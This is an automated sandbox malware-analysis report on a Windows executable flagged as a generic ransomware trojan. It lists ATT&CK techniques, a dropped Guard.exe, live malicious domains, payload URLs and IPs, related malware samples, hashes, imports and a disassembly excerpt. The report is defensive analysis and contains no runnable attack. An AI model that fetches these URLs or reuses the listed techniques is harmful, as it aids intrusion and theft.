Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A212400 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF73A212400
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A1F1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF73A1F1D80
Source: elyho3x5zz.exe, 00000000.00000003.2465589550.00000230D779B000.00000004.00000020.00020000.00000000.sdmp, elyho3x5zz.exe, 00000000.00000003.2465670604.00000230D77A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: elyho3x5zz.exe, 00000000.00000002.2465958459.00000230D77A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rs\Public\Guard.exe
Source: elyho3x5zz.exe, 00000000.00000002.2465821530.000000E808DD9000.00000004.00000010.00020000.00000000.sdmp, elyho3x5zz.exe, 00000000.00000002.2465910493.00000230D7778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: elyho3x5zz.exeBinary or memory string: WIN_81
Source: elyho3x5zz.exeBinary or memory string: WIN_XP
Source: elyho3x5zz.exeBinary or memory string: WIN_XPe
Source: elyho3x5zz.exeBinary or memory string: WIN_VISTA
Source: elyho3x5zz.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: elyho3x5zz.exeBinary or memory string: WIN_7
Source: elyho3x5zz.exeBinary or memory string: WIN_8
Source: C:\Users\user\Desktop\elyho3x5zz.exeCode function: 0_2_00007FF73A263940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF73A263940
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts
1
Native API
1
DLL Side-Loading
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
11
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
PowerShell
2
Valid Accounts
1
DLL Side-Loading
1
Obfuscated Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol11
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
Valid Accounts
1
DLL Side-Loading
Security Account Manager1
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
Access Token Manipulation
11
Masquerading
NTDS25
System Information Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
Process Injection
2
Valid Accounts
LSA Secrets4
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
Virtualization/Sandbox Evasion
Cached Domain Credentials21
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Access Token Manipulation
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
Process Injection
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
elyho3x5zz.exe56%VirustotalBrowse
elyho3x5zz.exe39%ReversingLabsWin32.Ransomware.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://bdfhbrgrg.xyz/yajwgWMT.txt0%Avira URL Cloudsafe
https://bdfhbrgrg.xyz/ImldXigH0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
bdfhbrgrg.xyz
188.114.96.3
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://bdfhbrgrg.xyz/ImldXigHtrue
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://bdfhbrgrg.xyz/yajwgWMT.txtelyho3x5zz.exe, 00000000.00000002.2465910493.00000230D7778000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    188.114.96.3
    bdfhbrgrg.xyzEuropean Union
    13335CLOUDFLARENETUStrue
    Joe Sandbox version:41.0.0 Charoite
    Analysis ID:1584333
    Start date and time:2025-01-05 08:43:18 +01:00
    Joe Sandbox product:CloudBasic
    Overall analysis duration:0h 5m 41s
    Hypervisor based Inspection enabled:false
    Report type:full
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
    Run name:Run with higher sleep bypass
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Sample name:elyho3x5zz.exe
    renamed because original name is a hash value
    Original Sample Name:69931884c719a49700d9b1921e915ed0.exe
    Detection:MAL
    Classification:mal76.troj.evad.winEXE@4/4@1/1
    EGA Information:
    • Successful, ratio: 100%
    HCA Information:
    • Successful, ratio: 94%
    • Number of executed functions: 42
    • Number of non-executed functions: 247
    Cookbook Comments:
    • Found application associated with file extension: .exe
    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report size exceeded maximum capacity and may have missing disassembly code.
    No simulations
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    188.114.96.3Gg6wivFINd.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
    • unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
    QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
    • filetransfer.io/data-package/u7ghXEYp/download
    CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
    • www.mffnow.info/1a34/
    A2028041200SD.exeGet hashmaliciousFormBookBrowse
    • www.mydreamdeal.click/1ag2/
    SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
    • www.questmatch.pro/ipd6/
    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
    • filetransfer.io/data-package/I7fmQg9d/download
    need quotations.exeGet hashmaliciousFormBookBrowse
    • www.rtpwslot888gol.sbs/jmkz/
    QUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
    • filetransfer.io/data-package/Bh1Kj4RD/download
    http://kklk16.bsyo45ksda.topGet hashmaliciousUnknownBrowse
    • kklk16.bsyo45ksda.top/favicon.ico
    QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
    • filetransfer.io/data-package/XrlEIxYp/download
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    CLOUDFLARENETUSTax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
    • 172.64.41.3
    X9g8L63QGs.exeGet hashmaliciousBlank GrabberBrowse
    • 162.159.137.232
    KpHYfxnJs6.exeGet hashmaliciousBlank GrabberBrowse
    • 162.159.137.232
    https://bit.ly/3VYGxmhGet hashmaliciousCAPTCHA Scam ClickFix, PhisherBrowse
    • 104.18.95.41
    armv6l.elfGet hashmaliciousUnknownBrowse
    • 198.41.197.77
    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
    • 172.64.41.3
    Yoranis Setup.exeGet hashmaliciousUnknownBrowse
    • 104.26.13.205
    file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
    • 104.26.12.205
    file.exeGet hashmaliciousLummaC, PureLog StealerBrowse
    • 104.21.64.1
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    3b5074b1b5d032e5620f69f9f700ff0eTax_Refund_Claim_2024_Australian_Taxation_Office.jsGet hashmaliciousRemcosBrowse
    • 188.114.96.3
    c2.htaGet hashmaliciousRemcosBrowse
    • 188.114.96.3
    3lhrJ4X.exeGet hashmaliciousLiteHTTP BotBrowse
    • 188.114.96.3
    CEFA-FAS_LicMgr.exeGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    same.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWormBrowse
    • 188.114.96.3
    m.txt.ps1Get hashmaliciousUnknownBrowse
    • 188.114.96.3
    XClient.exeGet hashmaliciousXWormBrowse
    • 188.114.96.3
    1111.htaGet hashmaliciousUnknownBrowse
    • 188.114.96.3
    No context
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):9434
    Entropy (8bit):4.928515784730612
    Encrypted:false
    SSDEEP:192:Lxoe5qpOZxoe54ib4ZVsm5emdrgkjDt4iWN3yBGHVQ9smzdcU6Cj9dcU6CG9smAH:srib4ZIkjh4iUxsT6Ypib47
    MD5:D3594118838EF8580975DDA877E44DEB
    SHA1:0ACABEA9B50CA74E6EBAE326251253BAF2E53371
    SHA-256:456A877AFDD786310F7DAF74CCBC7FB6B0A0D14ABD37E3D6DE9D8277FFAC7DDE
    SHA-512:103EA89FA5AC7E661417BBFE049415EF7FA6A09C461337C174DF02925D6A691994FE91B148B28D6A712604BDBC4D1DB5FEED8F879731B36326725AA9714AC53C
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:data
    Category:dropped
    Size (bytes):64
    Entropy (8bit):1.1940658735648508
    Encrypted:false
    SSDEEP:3:Nlllulp77th:NllU
    MD5:7B5F360646F3167812DC4ADF7B166512
    SHA1:F00A325C611E6C9CC6D2069C0FEAE54C6B7E48E5
    SHA-256:672CD1B39FD62CBC4EEAC339C7863E190A95CEF4DDCEF0F4A5BE946E098B63B0
    SHA-512:7CA2CD8F0A6E6388628AC33A539DB661FCFFE08453DFACFE353B18B548ABC08072BF2FDAE40EEEA671137FE137177ADB4E322D9C77CDE8B6AADE7600EA4C18E0
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:@...e.................................x..............@..........
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Reputation:high, very likely benign file
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:ASCII text, with no line terminators
    Category:dropped
    Size (bytes):60
    Entropy (8bit):4.038920595031593
    Encrypted:false
    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
    MD5:D17FE0A3F47BE24A6453E9EF58C94641
    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
    Malicious:false
    Preview:# PowerShell test file to determine AppLocker lockdown mode
    File type:PE32+ executable (GUI) x86-64, for MS Windows
    Entropy (8bit):6.306406255978983
    TrID:
    • Win64 Executable GUI (202006/5) 92.65%
    • Win64 Executable (generic) (12005/4) 5.51%
    • Generic Win/DOS Executable (2004/3) 0.92%
    • DOS Executable Generic (2002/1) 0.92%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:elyho3x5zz.exe
    File size:1'083'904 bytes
    MD5:69931884c719a49700d9b1921e915ed0
    SHA1:9d01852540ef12d782a18f0aae776a4af90be433
    SHA256:d438f531f435c04c139ff9895885a3bc721958fde5354d738bb928b1899e5693
    SHA512:069f18068ee4fdf10c829cd3dd5982d7643a491ee26a9a5c2bd84bc7ff04b6f97bfdc0e16a7c01d01a4dbe131dd06a912cd49a78f156f48bf1946bb65b7d5293
    SSDEEP:24576:PrORE29TTVx8aBRd1h1orq+GWE0Jc5bDTj1Vyv9Tvan1r:P2EYTb8atv1orq+pEiSDTj1VyvBa1
    TLSH:F7357C4973A4419DFEABE1B6CA23C607D6B17C490276861F01A47B767F337712A2E321
    File Content Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......o1).+PG.+PG.+PG.....>PG......PG......PG.....*PG.y8B..PG.y8C.:PG.y8D.#PG."(..#PG."(..*PG."(...PG.+PF..RG..9I.{PG..9D.*PG..9..*PG
    Icon Hash:0fd88dc89ea7861b
    Entrypoint:0x14002549c
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x140000000
    Subsystem:windows gui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x6773AA89 [Tue Dec 31 08:25:45 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:2
    File Version Major:5
    File Version Minor:2
    Subsystem Version Major:5
    Subsystem Version Minor:2
    Import Hash:fadc5a257419d2541a6b13dfb5e311e2
    Instruction
    dec eax
    sub esp, 28h
    call 00007F9B208968B0h
    dec eax
    add esp, 28h
    jmp 00007F9B208961BFh
    int3
    int3
    inc eax
    push ebx
    dec eax
    sub esp, 20h
    dec eax
    mov ebx, ecx
    dec eax
    mov eax, edx
    dec eax
    lea ecx, dword ptr [0009466Dh]
    dec eax
    mov dword ptr [ebx], ecx
    dec eax
    lea edx, dword ptr [ebx+08h]
    xor ecx, ecx
    dec eax
    mov dword ptr [edx], ecx
    dec eax
    mov dword ptr [edx+08h], ecx
    dec eax
    lea ecx, dword ptr [eax+08h]
    call 00007F9B20897DC9h
    dec eax
    lea eax, dword ptr [0009467Dh]
    dec eax
    mov dword ptr [ebx], eax
    dec eax
    mov eax, ebx
    dec eax
    add esp, 20h
    pop ebx
    ret
    int3
    dec eax
    and dword ptr [ecx+10h], 00000000h
    dec eax
    lea eax, dword ptr [00094674h]
    dec eax
    mov dword ptr [ecx+08h], eax
    dec eax
    lea eax, dword ptr [00094659h]
    dec eax
    mov dword ptr [ecx], eax
    dec eax
    mov eax, ecx
    ret
    int3
    int3
    inc eax
    push ebx
    dec eax
    sub esp, 20h
    dec eax
    mov ebx, ecx
    dec eax
    mov eax, edx
    dec eax
    lea ecx, dword ptr [0009460Dh]
    dec eax
    mov dword ptr [ebx], ecx
    dec eax
    lea edx, dword ptr [ebx+08h]
    xor ecx, ecx
    dec eax
    mov dword ptr [edx], ecx
    dec eax
    mov dword ptr [edx+08h], ecx
    dec eax
    lea ecx, dword ptr [eax+08h]
    call 00007F9B20897D69h
    dec eax
    lea eax, dword ptr [00094645h]
    dec eax
    mov dword ptr [ebx], eax
    dec eax
    mov eax, ebx
    dec eax
    add esp, 20h
    pop ebx
    ret
    int3
    dec eax
    and dword ptr [ecx+10h], 00000000h
    dec eax
    lea eax, dword ptr [0009463Ch]
    dec eax
    mov dword ptr [ecx+08h], eax
    dec eax
    lea eax, dword ptr [00000021h]
    Programming Language:
    • [ C ] VS2008 SP1 build 30729
    • [IMP] VS2008 SP1 build 30729
    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0xe5c100x17c.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0xfb0000x140fc.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf40000x6f48.pdata
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x1100000xa74.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0xc70500x1c.rdata
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0xd9aa00x28.rdata
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xc70700x100.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0xb50000x1138.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000xb33280xb3400507a8505198e35cc9675301d53e3b1c4False0.5503358721234309data6.5212967575920215IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    .rdata0xb50000x342040x344009eda36be0cf076085a2f9772c1ee5803False0.30884139503588515data5.360588077813426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0xea0000x91200x5000ec6b77d6ef8898b0d3b7d48c042d66a0False0.040673828125DOS executable (block device driver)0.5749243362866429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    .pdata0xf40000x6f480x70004416e27f8be9f9271c439d2fd34d1b2dFalse0.49612862723214285data5.911479421450324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .rsrc0xfb0000x140fc0x142004214549914061d73180b66f91844d288False0.19348068711180125data4.245897898582436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x1100000xa740xc005ddb0e422ace102fe530e589a0cbec6fFalse0.4850260416666667data5.139847116863034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
    NameRVASizeTypeLanguageCountryZLIB Complexity
    RT_ICON0xfb4580x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
    RT_ICON0xfb5800x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
    RT_ICON0xfb6a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
    RT_ICON0xfb7d00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 60472 x 60472 px/mEnglishGreat Britain0.14468236129184905
    RT_MENU0x10bff80x50dataEnglishGreat Britain0.9
    RT_STRING0x10c0480x594dataEnglishGreat Britain0.3333333333333333
    RT_STRING0x10c5dc0x68adataEnglishGreat Britain0.2735961768219833
    RT_STRING0x10cc680x490dataEnglishGreat Britain0.3715753424657534
    RT_STRING0x10d0f80x5fcdataEnglishGreat Britain0.3087467362924282
    RT_STRING0x10d6f40x65cdataEnglishGreat Britain0.34336609336609336
    RT_STRING0x10dd500x466dataEnglishGreat Britain0.3605683836589698
    RT_STRING0x10e1b80x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
    RT_RCDATA0x10e3100x8d0data1.0048758865248226
    RT_GROUP_ICON0x10ebe00x14dataEnglishGreat Britain1.25
    RT_GROUP_ICON0x10ebf40x14dataEnglishGreat Britain1.25
    RT_GROUP_ICON0x10ec080x14dataEnglishGreat Britain1.15
    RT_GROUP_ICON0x10ec1c0x14dataEnglishGreat Britain1.25
    RT_VERSION0x10ec300xdcdataEnglishGreat Britain0.6181818181818182
    RT_MANIFEST0x10ed0c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823
    DLLImport
    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
    PSAPI.DLLGetProcessMemoryInfo
    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
    UxTheme.dllIsThemeActive
    KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, GetFullPathNameW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, EnterCriticalSection, DuplicateHandle, GetStdHandle, CreatePipe, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, IsProcessorFeaturePresent, GetSystemTimeAsFileTime, CreateThread, GetCurrentProcess, GetCurrentThread, LeaveCriticalSection, InitializeSListHead, RtlUnwindEx, RtlPcToFileHeader, SetLastError, TlsAlloc, ResetEvent, WaitForSingleObjectEx, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, CloseHandle, WriteConsoleW, MoveFileW, RtlCaptureContext
    USER32.dllGetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetWindowLongW, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongPtrW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, SetWindowLongPtrW, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, IsCharUpperW, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, GetClipboardData, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, 